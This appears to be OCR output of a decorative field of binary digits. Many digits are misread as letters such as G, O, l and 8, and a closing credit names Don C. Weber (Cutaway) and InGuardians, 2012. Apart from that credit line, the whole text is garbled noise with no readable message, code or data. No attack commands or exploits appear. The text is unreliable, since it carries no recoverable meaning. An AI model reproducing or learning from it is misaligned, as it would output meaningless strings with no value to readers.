10G0 10 1 100 GOO 11011001 100 100G 1G0G 11101 1000 1 100 1 1 10000 1 1 10 1 1 10 1 1 1 1 10 10 10> 001011100000100110010111111111 10100101110 11100101101111 1000 100 10 lOOOll 1000 100 10 1101 lOO 1 10 000 101 100 1000 1 1 1000 1101100011011111100111 lOOOOO 1 1 ] OllOllllOOl lOOOO 100 1 lOO 11010111 1000 10 1 1 10 1000 1 100 1 10 1 1 GO 0111 1O0OOOOO 1 1 10 100 1 1G0G0 1 10 1G 1 1GGGG 10GG 1 1 1 10 1 1 11 10G 1 1GG 1G0G0G0 1 1 1 1GGGG 10 10 1 lOOOOO 100 lOGOOOGOGOGC OGO 1 OOO000011 OO1O011O111OO1OO 11O111OO111101O10OOO 10001101 11OGO0OO11 1001111000001111 011011111011111001 111110 1G0G1O111OO looioiiiiiioioooi ; 10OO01 11 01 1 1G 1GG0 1 10000 10G0G HOGG 11 1G 00 1 10 1 1 1G 1 1 10 1 1 GOO 1 10 100000 1 1 10 10 1 1 10 10 10 1101 1G 10 1 10 01 mm 0O11OOO1OO1O11OO11O001O11 100010011 010 101 1O011OO11O1OOG1 10 1111111 1( 001 1001 llOQQO OOOl 11101 1000 100 1 100 lOOOO 1 10 1 10 1000 100111100 10 1 1 1000 1000 1 10011100 1000 100 1GG 11 100 10101010100010 10G1G 000 11 1000 101 Gl 1 110100111010 00101 00100001010110 0G1100 G 10 111 0010111010011 H11O101O10] OOOlOllO: 11G llOOOOO 101 01 00 1 100000 10 100 1 1 1 1000 1 1 1 1 1 100 1 1 100 1 10 10000 1 100 100- 1 1000 1000 1000800 101101001111 10000 11001010 1000 110110 0111011101010010010000110001101101101001111001 '01101010111100111111000001110100111100100000 1 10 1 10 100G00G 100 10 100 1 1 10 1 1 1 100 1 1 1 10 19 1 10 1Q 10 100 1 1 1 1 1 1 1 1 1 1 1 10 1000 1 100 1Q 1 1 1 10 1110111010011 lOOOOOOOOOO 101001011 10 100101001011 100 10110110001 180 1011111101 1000 1 1000 100 100 100 10111 10110001101100101001000011101 00000111081800100011011118810011000108811111 10111110111101100010811811001 01100010010010010100111111 001101GG01100010110111101101101010111101101111011GG1001 100 1 100 10 1 1 100 10 10 100 10 100 1 10101008881811110001010 188188811111111118111110100001818811010100018188880110111011881 80811001101011111181100 1 1 10 1 1 1 1 10 10 10 1 1 10 10 0011001 10000 10 10 1 100 1 1 1 1 1 1 100 10 1 1 1000GG0 100 1 100 110011 1000 1 100 100 811011110110101100110 1 10 10 1 1 1 18 188 1 100 1 00 10000 18 1 1 188 1 100 100 1 1 1888 1 1888 1 18 180 100100 188 1 18 1GGG00 1 100 1000 188111 1000 0101100000111101 1110001110001100010111000108 118181110011001011010111111 0001101100110111 G00O10OOOO111G 0010100111010011111111110101 1 100 1 10 1 1 1 1 10 1 10 1 1 1 1 10 10 100 01111000101001 oiiiioiioni loieeeioiioiiiioiiiieiGGiioi oeooioiiimi 011111110101110010000001 100 1 oiioieieim 0100101111 10000010000011111100000000011 001100111001101011 10010010011001101000010110101 0100100000 111100118 00 100 loo 100 1 1 1000 100 1 10 1 1 1 1 10 11111111010110111011 000 1 1 1 100 10000 1 100 1 100000000 1 1 001000100 1110101 001110110011111111001001011101 10100010110100100111011 000111100011001111000010111001 11001100 oiiioo 110100110110010010110101101100 o 1 1 10 10 10 loo 1 1 10 100 1 100 1 010001011100110111011001001000 000110 00111 11111100011101111110000110011011 88810010101011000000011101 00000111100011000001101110010101 00000 1011 18101010101181180010011088811811 01110811811101100001888881001111 GOGO 01G1 0111011G100101000111GG0101111110 00111001001001110010110001110110 GIG 111 1888011001118118180001188818188 0010111101010011188188101000111 010 10 100000 1GG000 10 11 101111100000 11 10110011111001011111010000001 00 01 01 1000000 lOOOOO 110 llGOOO 11 101 00111000111000011000010110110100001 11011001000101010101000010110 01 1 1881880010101108118101010000 00118181100001110108818810001100081818 181011111081818810000100008 1 001101110000000010011101010 01000001010 100 11101110010 lOOOO 11111110100 111111101011000001111110000 lo io i io io i i io i io ioooooo io GoioiooiieiioiioooooiiioeeiiiiiieieiiiieiGGG 0011010011110100000111110 000 10011110 100000 10 1 1 100 0101011001101101100101011 100 10000 10 10000000 10000 010011 100000 1 1 1 100000000 0000 10000 10 10 1000000 1 1 10000 1 1 1 100 1 10000 100 10 1000 1 10 10000 100 100 10 1 1 1 1 1 100 0000001100011011101101 1010010101010101101111 001101010101001001110100110110110000000101001001101011 0000010000010101110110 11110100 11 101110001 101000110000101010010 000 1 10 llGOOO 10 10 100 110 10 11 1000 0010110000111111010 11000101100110111 111011 GOlOllOOOl 011111011000111110 10101 011110011011001111 1 1110111000001111 11110 110 1101010101110 01111101001001000101001 000110 8188800110111001 1 1 100000011101100 01000 10 1-00000110110010111 "10110010111 Ol 10100 O11OOOO101OOOO1 1 o 001101111000100- lino 011OO11G1G01O1HO8 1010011111 ididoi niooiioioioiioo oo 00 0110011100001111 10 100000000 1 100000000 11111 1000 1 1' 11000101110001010100 OO11O1O1G11011OO 11 100 910100110111001101 OlOO 10 1O0O0O0O1O11G lGOO 10111110010 10 1O0O0O0O11OG 10 100100 OlllllOOOGOlOlllll 111 101 811011100101100100 01 10 IO lOO 10 11 1000 lOO 1000 10 110 100 HO lOO 11 10 10 100 HO 10 000100101001010110 GOO 11111 1OOO1011O1011O0OOO1 1111000010001111111111101011101110111000010111000 10O10O01O0OO1OOO0O1 1110 110OO 00010110111111011011 100000000G00G0000 1 10 10 10 1 1 1 1 10 10 1 100 10 1 10 10 1 1 1 11111001000111111101 00101 110OOO 1101110011111101010 10010000011101100011101110000101101011011111 O1O10O111OO1OO11OOO 000001 0010110 11000111011001100001 0101 100000 1 100000 1 1 1 100 1 10000 1 1 1 10 1 10000 111GGGO0O111O1111G1O 001 1001 1O00111OG 10000111111O1O10O0O 100000001001111111011011000111000000 O1111OO1O00101O110O1 101101011 1101O10OO1 1 10 1 1 1 1 1 1000000 100 18 10001000 lOO 11110011101 10 10O011O1O1 11111O11G10O0OO11OOO 1010010100 111111111011 11100000011010001111 1011111110011100010 011101100001 GG0O10OO1OO1O1 1O1111G110111O11O1O 1010O1O1OGG111111OO 1101OO111O1G11 1O001O1101OO1GO 111O1010O1011OOOO 100011111011110010 100110111O1O1OO0 1G0O11O1 1000 1 1 1000 lGOOOl lOO 10111 lOOOO lOOOO 101110110 1000 111110101011001 lOOOO 1110OOOO111O101O11O 0011010111011 1000 1 01101111101011011001 1101011OOO1G1110O0O110O111110O0O001O0OO11GG1111010O1OOGG1110101O11OO11 10B 1 1 1 1 1 1 10 10 1 10 10000 O1O10O11110OOOOO1111O1O OO0O01O11OO110O0O011111O11O1101111111111O110O0O1111OO11O0O11OO 000 10 1 1 10 1 1 10 10 10000 1 1 1 100 10 1 100 10000 1 1 1 1 10 100 10 11111GO0111110OO1G1G101O10111O111G1101O10111O1GG110O01 01111GG1G1GG11G11G1GG1G1G 11O111101OO lOOOOO lOOOO IO 100 10 111111 100 IO 1 lOOOOO 1 1 10 100 lOOOO 1O110O110 1000 10 10OO 11OO111O1O0O0O1 IO IO 10 10 1 110010100111011101100101001001111 1 10 10 lOOOO lOO lOO 111GGG lOO IO 11 1G 1GG00 1 1 1 1G 1GGG0 1110111 1GGG 1 1 10 1 OO0000001O10OOOO10110O0O1011OO1O010011 1 10 IO 100 1 1 1000 1 1000 111111 IO 1101 lOOOOO 1 1G101O10O0O11G1G0O011110111G1G1101011OOOOG11 10 1 1G 1G 1 1G 1GG 10 10G0 1 1 1GG 1 10 1 1 10 1GGGG 1 1GGGG 1 0111100110 1000 1O0O011 lOOOO 11111" 1 11' '0000 10 1 lOO 1101100001110010101111010 lOOOO 11011001001011011011 Don C. Weber / Cutaway: don@inguardians.com Copyright 2012 InGuardians, Inc.